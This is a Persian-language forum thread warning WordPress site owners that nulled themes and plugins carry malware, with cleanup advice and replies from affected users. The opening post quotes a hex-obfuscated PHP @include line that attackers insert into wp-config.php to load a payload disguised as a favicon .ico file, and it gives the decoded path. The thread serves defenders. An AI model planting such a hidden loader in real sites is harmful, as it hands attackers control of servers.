صفحه 1 از 2 12 آخرینآخرین
نمایش نتایج: از شماره 1 تا 10 , از مجموع 13

موضوع: هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

  1. #1
    عضو دائم sazsaz آواتار ها
    تاریخ عضویت
    Aug 2011
    محل سکونت
    بندر گناوه
    نوشته ها
    1,123
    تشکر تشکر کرده 
    296
    تشکر تشکر شده 
    1,265
    تشکر شده در
    861 پست

    پیش فرض هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی
    قبلا چندین بار هشدار دادیم و کسی توجه نکرد
    متاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهند
    عزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنید
    هکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .
    - چند مدیریت برای خویش فعال می کنند
    - با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )
    فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.
    من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .
    favicon_3a0642.ico
    favicon_993c6a.ico
    حالا با آن دسترسی ها همه جا را ویرایش و خراب می کنند
    در فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنند

    کد:
     @include  "\x2fh\x6fm\x65/\x6ea\x67h\x61s\x68y\x2fp\x75b\x6ci\x63_\x68t\x6dl  \x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x399\x33c\x36a\x2ei\x63o";  

    که دیکد آن چنین می شود

    کد:
        @include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";
    حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند .....

    حال چطور این طور سایت ها را رفع مشکل کنیم
    1- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم
    2- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم
    3- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم
    4- سطح فایل کانفیگ را 444 قرار می دهیم
    5- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم
    6- بر روی پوشه مدیریت پسورد می گذاریم
    7- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.



    برگرفته شده از انجمن وردپرس ایرانی




  2. تعداد تشکر ها ازsazsaz به دلیل پست مفید


  3. # ADS




     

  4. #2
    عضو جدید mre آواتار ها
    تاریخ عضویت
    Jul 2017
    محل سکونت
    I.R.IRAN
    نوشته ها
    50
    تشکر تشکر کرده 
    62
    تشکر تشکر شده 
    65
    تشکر شده در
    52 پست

    پیش فرض پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    سلام
    ممنون بابت مطلب خوبتون
    واقعا این یکی از معضلات امروزی حوزه وب هست و نمیدونم تا کجا میخواد توسط افراد سودجو ادامه پیدا کنه

    در تکمیل مطالب بالا شاید بررسی دسترسی ها به دیتابیس از طریق cPanel و گزینه Remote MySQL هم خالی از لطف نباشه که فقط IP سرور قابلیت دسترسی داشته باشه و غیر از اون دسترسی دیگه ای وجود نداشته باشه

    موفق باشید
    با احترام

  5. تعداد تشکر ها ازmre به دلیل پست مفید


  6. #3
    عضو دائم sazsaz آواتار ها
    تاریخ عضویت
    Aug 2011
    محل سکونت
    بندر گناوه
    نوشته ها
    1,123
    تشکر تشکر کرده 
    296
    تشکر تشکر شده 
    1,265
    تشکر شده در
    861 پست

    پیش فرض پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    نقل قول نوشته اصلی توسط mre نمایش پست ها
    سلام
    ممنون بابت مطلب خوبتون
    واقعا این یکی از معضلات امروزی حوزه وب هست و نمیدونم تا کجا میخواد توسط افراد سودجو ادامه پیدا کنه

    در تکمیل مطالب بالا شاید بررسی دسترسی ها به دیتابیس از طریق cPanel و گزینه Remote MySQL هم خالی از لطف نباشه که فقط IP سرور قابلیت دسترسی داشته باشه و غیر از اون دسترسی دیگه ای وجود نداشته باشه

    موفق باشید
    با احترام
    دقیقا توی 10 روز گذشته با بیش از 7 سایت با این مشکل برخورد کرده ام و همه از قالب های نال استفاده می کردند

  7. تعداد تشکر ها از sazsaz به دلیل پست مفید

    mre

  8. #4
    عضو انجمن
    تاریخ عضویت
    Mar 2013
    نوشته ها
    163
    تشکر تشکر کرده 
    356
    تشکر تشکر شده 
    247
    تشکر شده در
    180 پست

    پیش فرض پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    بنده با نصب یک پلاگین نال شده ووکامرس در عرض یک هفته سه بار هک شدم که ایملهای تبلیغاتی ارسال میشد موجب شد ای پی سرور اسپم بشه و ایمیل هاستینگ کلا از کار بیفته که بلاخره پلاگین رو جایگزین کردم و با نصب چند افزنه امینتی فایلهای مشکوک و مخرب رو حذف کردم خداروشکر الان دو هفته است پاک پاکم

  9. تعداد تشکر ها ازParti_Baz به دلیل پست مفید


  10. #5
    عضو انجمن a1994n1373 آواتار ها
    تاریخ عضویت
    Jan 2012
    محل سکونت
    https://t.me/ALiNezamifarDotCom
    نوشته ها
    603
    تشکر تشکر کرده 
    167
    تشکر تشکر شده 
    660
    تشکر شده در
    570 پست

    پیش فرض پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    سلام دوست عزیز . مرسی از اطلاع رسانیتون . بله متاسفانه مردم ما کیفیت و اوریجینال بودن رو فدای قیمت پایین و یا رایگان بودن می کنن !!!
    بیا تو هاست | سرور اختصاصی-مجازی-هاست-پنل پیامک
    تلگرام نظامی فر: @ALiNezamifarDotCom
    واتس آپ / تماس / پیامک :09365677482

  11. تعداد تشکر ها ازa1994n1373 به دلیل پست مفید


  12. #6
    عضو انجمن
    تاریخ عضویت
    Mar 2011
    نوشته ها
    266
    تشکر تشکر کرده 
    203
    تشکر تشکر شده 
    161
    تشکر شده در
    123 پست

    پیش فرض پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    درود
    متاسفانه من چندین ماهه درگیر این نوع سایت ها هستم و هر کاریم میکنیم باز بر میگردن با هر ابزاریم ک تست می کنیم چیزی پیدا نمیکنه
    تمام کدهای مخربش رو پاک میکنیم ولی بعد 1 روز مجدد ظاهر میشن.واقعا روی اعصابه این نوع آلودگی!!

  13. تعداد تشکر ها ازAria90 به دلیل پست مفید


  14. #7
    عضو دائم sazsaz آواتار ها
    تاریخ عضویت
    Aug 2011
    محل سکونت
    بندر گناوه
    نوشته ها
    1,123
    تشکر تشکر کرده 
    296
    تشکر تشکر شده 
    1,265
    تشکر شده در
    861 پست

    پیش فرض پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    نقل قول نوشته اصلی توسط Aria90 نمایش پست ها
    درود
    متاسفانه من چندین ماهه درگیر این نوع سایت ها هستم و هر کاریم میکنیم باز بر میگردن با هر ابزاریم ک تست می کنیم چیزی پیدا نمیکنه
    تمام کدهای مخربش رو پاک میکنیم ولی بعد 1 روز مجدد ظاهر میشن.واقعا روی اعصابه این نوع آلودگی!!
    همانطور که می بینیم همه عاصی و کلافه هستند .
    من سایت یکی از کاربران را جدیدا کامل حذف و دوباره بالا آوردم
    البته لازم هست بگم که بهتره پسورد مدیریت را چک کنید از طریق پسورد و کرک آن نیز دست به این اعمال می توان زد

  15. #8
    عضو جدید rahimi_m321 آواتار ها
    تاریخ عضویت
    Jul 2014
    محل سکونت
    shiraz
    نوشته ها
    75
    تشکر تشکر کرده 
    42
    تشکر تشکر شده 
    85
    تشکر شده در
    77 پست

    پیش فرض پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    ممنون از اطلاع رسانیتون
    برتر وی پی اس
    دارای نماد اعتماد دو ستاره
    شیراز - بلوار ازادی - نبش کوچه 10 طبقه فوقانی شیرینی لادن- همراه: 09210361263

  16. #9
    عضو انجمن
    تاریخ عضویت
    Jul 2010
    نوشته ها
    361
    تشکر تشکر کرده 
    648
    تشکر تشکر شده 
    1,664
    تشکر شده در
    814 پست

    پیش فرض پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    نقل قول نوشته اصلی توسط mre نمایش پست ها
    واقعا این یکی از معضلات امروزی حوزه وب هست و نمیدونم تا کجا میخواد توسط افراد سودجو ادامه پیدا کنه
    در واقع سوء استفاده از طراح و خالق این محصولات انجام شده، نه از کسایی که دنبال مفت هستن!

    سالهاست با خواهش و تمنا، التماس به این و اون، برای فرهنگ کپی رایت و استفاده از محصولات اورجینال دارم زحمت میکشم، چیزی جز خنده و مسخره دیگران ندیدم که وقتی مفتش هست، کی میاد بخره!

    اینم آخر و عاقبتش!


  17. تعداد تشکر ها ازiranian-portal به دلیل پست مفید


  18. #10
    عضو جدید codfather آواتار ها
    تاریخ عضویت
    Aug 2017
    محل سکونت
    [root@localhost]
    نوشته ها
    57
    تشکر تشکر کرده 
    25
    تشکر تشکر شده 
    54
    تشکر شده در
    36 پست

    پیش فرض پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

    توی تلگرام هم شیوع پیدا کرده
    قالب ها و اسکریپت های پولی رو آلوده میزارن
    اغلب هم قالب های فروشگاهی وردپرس!!!!

صفحه 1 از 2 12 آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. پاسخ ها: 7
    آخرين نوشته: January 2nd, 2019, 11:13
  2. لیست کلیه ی سیستمهای مدیریت محتوای فارسی و فارسی شده
    توسط persiantools در انجمن سیستم های مدیریت محتوا
    پاسخ ها: 9
    آخرين نوشته: June 10th, 2013, 10:58
  3. پاسخ ها: 4
    آخرين نوشته: October 27th, 2010, 16:19

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •